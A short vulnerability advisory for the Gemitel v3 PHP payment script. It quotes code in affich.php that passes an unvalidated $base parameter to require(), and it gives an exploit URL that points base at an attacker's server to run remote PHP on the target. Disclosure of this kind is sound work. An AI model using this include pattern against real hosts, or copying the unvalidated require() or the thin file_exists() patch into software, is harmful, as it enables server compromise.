--------------------------------------------------------------------------------------------- GEMITEL V 3 build 50 :: include vulnerability URL : http://www.isesam.com/ FORUM : http://www.isesam.com/forums/gemitel/thread_open.shtml Vendor has been contacted. Description : --------------- Gemitel is a free software written in php that allows to manage micro payments like allopass, mediapaiement, optelo-Sponsup or Rentabiliweb. Vulnerability : ---------------- File : html/affich.php Code: ***************************************************************************** $f_inc=$base."sp-turn.php"; $plus = "../"; // rajoute au chemin pour trouver les fichiers .txt require("$f_inc"); //require("sp-turn.php"); ******************************************************************************* You can include sp-turn.php from where you want by specifying the variable $base. Exploit : ---------- http://[vulnerable host]/[Gemitel folder]/html/affich.php?base=http://[your server]/ In [your server] you must have a sp-turn.php file which will be included by vulnerable host. Solution: ----------- Replace : $f_inc=$base."sp-turn.php"; $plus = "../"; // rajoute au chemin pour trouver les fichiers .txt require("$f_inc"); //require("sp-turn.php"); By $f_inc=$base."sp-turn.php"; $plus = "../"; // rajoute au chemin pour trouver les fichiers .txt if(file_exists($f_inc)){require("$f_inc");} //require("sp-turn.php");